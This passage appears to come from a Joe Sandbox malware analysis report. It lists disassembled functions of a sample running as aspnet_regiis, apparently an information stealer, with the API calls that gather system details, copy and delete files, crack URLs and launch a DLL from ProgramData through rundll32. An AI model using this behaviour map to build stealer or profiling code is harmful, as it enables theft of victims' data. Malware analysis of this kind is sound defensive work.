                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 02A010E6
                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,02A184CC), ref: 02A01100
                                                                                                                                                                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 02A01107
                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 02A01112
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma_memset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1859398019-0
                                                                                                                                                                              • Opcode ID: b1ac6269581590f08497c4c85ca5ea95f6882be501a58cd91915de994e13ee12
                                                                                                                                                                              • Instruction ID: 522536f379611ac41fbdda5b0a9f8d3e5c826eae57647b3bd0593273713e5d9c
                                                                                                                                                                              • Opcode Fuzzy Hash: b1ac6269581590f08497c4c85ca5ea95f6882be501a58cd91915de994e13ee12
                                                                                                                                                                              • Instruction Fuzzy Hash: F6F0C272BC122077E22026753CDEFAB2A6C9B42F66F204414F308FB2C0DF65D81996B4
                                                                                                                                                                              Function 02A12962 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 182COMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrlen.KERNEL32(?,00000000,?,?,?,?,02A1709C,02A36C18,00000000,02A366CD,?,?,?,?,02A1858F), ref: 02A1061D
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcpy.KERNEL32(00000000,?), ref: 02A10645
                                                                                                                                                                                • Part of subcall function 02A10609: lstrcat.KERNEL32(?,00000000), ref: 02A10650
                                                                                                                                                                                • Part of subcall function 02A1058D: lstrcpy.KERNEL32(00000000,?), ref: 02A105BD
                                                                                                                                                                                • Part of subcall function 02A11C4A: GetSystemTime.KERNEL32(?,02A36701,?), ref: 02A11C79
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcpy.KERNEL32(00000000,?), ref: 02A105F5
                                                                                                                                                                                • Part of subcall function 02A105C7: lstrcat.KERNEL32(?,?), ref: 02A105FF
                                                                                                                                                                              • ShellExecuteEx.SHELL32(?), ref: 02A12B84
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                                                                                                              • String ID: "" $.dll$C:\ProgramData\$C:\Windows\system32\rundll32.exe
                                                                                                                                                                              • API String ID: 2215929589-2108736111
                                                                                                                                                                              • Opcode ID: 313dea26a475be0628c0d9fb62555a696187ee920ebbae2c94341e6aa221d057
                                                                                                                                                                              • Instruction ID: 94df2c19c44a382e72506c52a0b45a165d8bc3350688167b3407273eb6610c9a
                                                                                                                                                                              • Opcode Fuzzy Hash: 313dea26a475be0628c0d9fb62555a696187ee920ebbae2c94341e6aa221d057
                                                                                                                                                                              • Instruction Fuzzy Hash: AB71A732D80229ABDF11FFA5EA85ACDB7BABF04750F514161E910B7150DF70AE4A8F90
                                                                                                                                                                              Function 02A15DF7 Relevance: 8.9, APIs: 7, Instructions: 120stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15E86
                                                                                                                                                                                • Part of subcall function 02A11DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 02A11DFD
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A15EA3
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15EC2
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15ED6
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15EE9
                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 02A15EFD
                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 02A15F10
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                                • Part of subcall function 02A11D92: GetFileAttributesA.KERNEL32(?,?,?,02A0DA7F,?,?,?), ref: 02A11D99
                                                                                                                                                                                • Part of subcall function 02A15B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 02A15B30
                                                                                                                                                                                • Part of subcall function 02A15B0B: RtlAllocateHeap.NTDLL(00000000), ref: 02A15B37
                                                                                                                                                                                • Part of subcall function 02A15B0B: wsprintfA.USER32 ref: 02A15B50
                                                                                                                                                                                • Part of subcall function 02A15B0B: FindFirstFileA.KERNEL32(?,?), ref: 02A15B67
                                                                                                                                                                                • Part of subcall function 02A15B0B: StrCmpCA.SHLWAPI(?,02A36A98), ref: 02A15B88
                                                                                                                                                                                • Part of subcall function 02A15B0B: StrCmpCA.SHLWAPI(?,02A36A9C), ref: 02A15BA2
                                                                                                                                                                                • Part of subcall function 02A15B0B: wsprintfA.USER32 ref: 02A15BC9
                                                                                                                                                                                • Part of subcall function 02A15B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 02A15C86
                                                                                                                                                                                • Part of subcall function 02A15B0B: DeleteFileA.KERNEL32(?), ref: 02A15CA9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$File$Heapwsprintf$AllocateAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3709078413-0
                                                                                                                                                                              • Opcode ID: 1f0d1a50fe06f840223989295d16fcd8e72cd007bebd3d60066bf6ca34287afa
                                                                                                                                                                              • Instruction ID: 7188cd4800b153d723a322acce7914749eeac51236de130d2540b546374666b9
                                                                                                                                                                              • Opcode Fuzzy Hash: 1f0d1a50fe06f840223989295d16fcd8e72cd007bebd3d60066bf6ca34287afa
                                                                                                                                                                              • Instruction Fuzzy Hash: 9551CDB5E4022C9BCB54DF64DC84ADDB7B9AB4C310F8449E5EA09E3250EA309BD98F54
                                                                                                                                                                              Function 02A11684 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60stringCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A116CE
                                                                                                                                                                                • Part of subcall function 02A123D5: malloc.MSVCRT ref: 02A123DA
                                                                                                                                                                                • Part of subcall function 02A123D5: strncpy.MSVCRT ref: 02A123EB
                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 02A116F6
                                                                                                                                                                              • lstrcat.KERNEL32(?,02A36ECC), ref: 02A11713
                                                                                                                                                                              • GetCurrentHwProfileA.ADVAPI32(?), ref: 02A1169F
                                                                                                                                                                                • Part of subcall function 02A104E7: lstrcpy.KERNEL32(00000000,00000000), ref: 02A1050D
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcat$CurrentProfile_memsetlstrcpymallocstrncpy
                                                                                                                                                                              • String ID: Unknown
                                                                                                                                                                              • API String ID: 2781187439-1654365787
                                                                                                                                                                              • Opcode ID: 54e131e2f1c7424d59f2c7f0bd8446c8ffda096d16e41ac75df0d28aa92fa598
                                                                                                                                                                              • Instruction ID: b721e853cf07306c9ed9fda5cfb4bfcd7c2e124a8e8a55dcaf3e0c058abed7a7
                                                                                                                                                                              • Opcode Fuzzy Hash: 54e131e2f1c7424d59f2c7f0bd8446c8ffda096d16e41ac75df0d28aa92fa598
                                                                                                                                                                              • Instruction Fuzzy Hash: BF113071E80228ABDB21EB64DD85BDDB3B9AF14710F4004A5AA49E7140DE74EAC98F54
                                                                                                                                                                              Function 02A11119 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,02A36910,Display Resolution: ,02A368F4,00000000,User Name: ,02A368E4,00000000,Computer Name: ,02A368D0,AV: ,02A368C4,Install Date: ), ref: 02A11131
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A11138
                                                                                                                                                                              • GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 02A11154
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A1117A
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                                                                                                                                                              • String ID: %d MB
                                                                                                                                                                              • API String ID: 2922868504-2651807785
                                                                                                                                                                              • Opcode ID: ee87a33acdc787b711afca57e5d39c1be7d4b109ef1fac732d4e4eeb019b375e
                                                                                                                                                                              • Instruction ID: 901f0b62b3ca44fa7b7ead0433f3282f45398ad9b5d2a0e803cbbc2edf32afdb
                                                                                                                                                                              • Opcode Fuzzy Hash: ee87a33acdc787b711afca57e5d39c1be7d4b109ef1fac732d4e4eeb019b375e
                                                                                                                                                                              • Instruction Fuzzy Hash: 960186B1E40228ABE704DFB8DC45AEEB7BDEF04710F440569F606E7240DE74D9958B54
                                                                                                                                                                              Function 02A1BC21 Relevance: 7.6, APIs: 5, Instructions: 99fileCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,76E674F0,?,02A1CBEE,?,02A1CC7C,00000000,06400000,00000003,00000000,02A1757F,.exe,02A36C5C), ref: 02A1BC6E
                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,76E674F0,?,02A1CBEE,?,02A1CC7C,00000000,06400000,00000003,00000000), ref: 02A1BCA6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: File$CreatePointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2024441833-0
                                                                                                                                                                              • Opcode ID: 50caedc8e0f41d9e7cf91320b355c345e0530ab60828a494cb97fab9fead1807
                                                                                                                                                                              • Instruction ID: e43ad0a6c0c5cc0b18e4933a9e28fef517f92c0faaea8b13cf636d63664ccfcc
                                                                                                                                                                              • Opcode Fuzzy Hash: 50caedc8e0f41d9e7cf91320b355c345e0530ab60828a494cb97fab9fead1807
                                                                                                                                                                              • Instruction Fuzzy Hash: FB3181F0404704DFDB349F2588C4B26BAE8AB0536CF108E2EF19782591DB30A485CB35
                                                                                                                                                                              Function 6CA7C930 Relevance: 7.6, APIs: 5, Instructions: 83memoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6CA7C947
                                                                                                                                                                              • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CA7C969
                                                                                                                                                                              • GetSystemInfo.KERNEL32(?), ref: 6CA7C9A9
                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CA7C9C8
                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CA7C9E2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680314610.000000006CA61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6CA60000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680275252.000000006CA60000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680382031.000000006CADD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680422208.000000006CAEE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2680459198.000000006CAF2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6ca60000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Virtual$AllocInfoSystem$Free
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4191843772-0
                                                                                                                                                                              • Opcode ID: 979c81ae029a9f6d80c315e6b282edb2abe08e20c47fddf61252150fd2003764
                                                                                                                                                                              • Instruction ID: fbf43c1303c379c04e1527a57e21231a87513eb7241c92971a542dc7bda09e67
                                                                                                                                                                              • Opcode Fuzzy Hash: 979c81ae029a9f6d80c315e6b282edb2abe08e20c47fddf61252150fd2003764
                                                                                                                                                                              • Instruction Fuzzy Hash: DD212F357413156BD7989A68DC88BAE77B9FF4A708F50411DF90397640DB705C4487E4
                                                                                                                                                                              Function 02A04AB6 Relevance: 7.6, APIs: 5, Instructions: 50stringnetworkCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AE8
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AEE
                                                                                                                                                                              • ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 02A04AF4
                                                                                                                                                                              • lstrlen.KERNEL32(000000FF,00000000,?), ref: 02A04B06
                                                                                                                                                                              • InternetCrackUrlA.WININET(000000FF,00000000), ref: 02A04B0E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CrackInternetlstrlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1274457161-0
                                                                                                                                                                              • Opcode ID: 492e2d331f79ad50484c85e8296b4f7dbf4bb7a7a3683c87d9fc5f841f52a65a
                                                                                                                                                                              • Instruction ID: fac7907f8ad469d1cfb224d20337d5bf52323f26a871a993501c201aa7c4d6d8
                                                                                                                                                                              • Opcode Fuzzy Hash: 492e2d331f79ad50484c85e8296b4f7dbf4bb7a7a3683c87d9fc5f841f52a65a
                                                                                                                                                                              • Instruction Fuzzy Hash: D2011E31D00218ABCB149BA9EC45ADEBFB8AF55330F108616F925F72E0DB7496058B94
                                                                                                                                                                              Function 02A10F51 Relevance: 7.5, APIs: 5, Instructions: 35registrymemoryCOMMON
                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                              APIs
                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ,02A3692C), ref: 02A10F65
                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 02A10F6C
                                                                                                                                                                              • RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,02A36888,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ), ref: 02A10F8A
                                                                                                                                                                              • RegQueryValueExA.KERNEL32(02A36888,00000000,00000000,00000000,000000FF,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000), ref: 02A10FA6
                                                                                                                                                                              • RegCloseKey.ADVAPI32(02A36888,?,?,?,02A14252,Processor: ,[Hardware],02A36950,00000000,TimeZone: ,02A36940,00000000,Local Time: ,02A3692C,Keyboard Languages: ,02A36910), ref: 02A10FAF
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmpDownload File
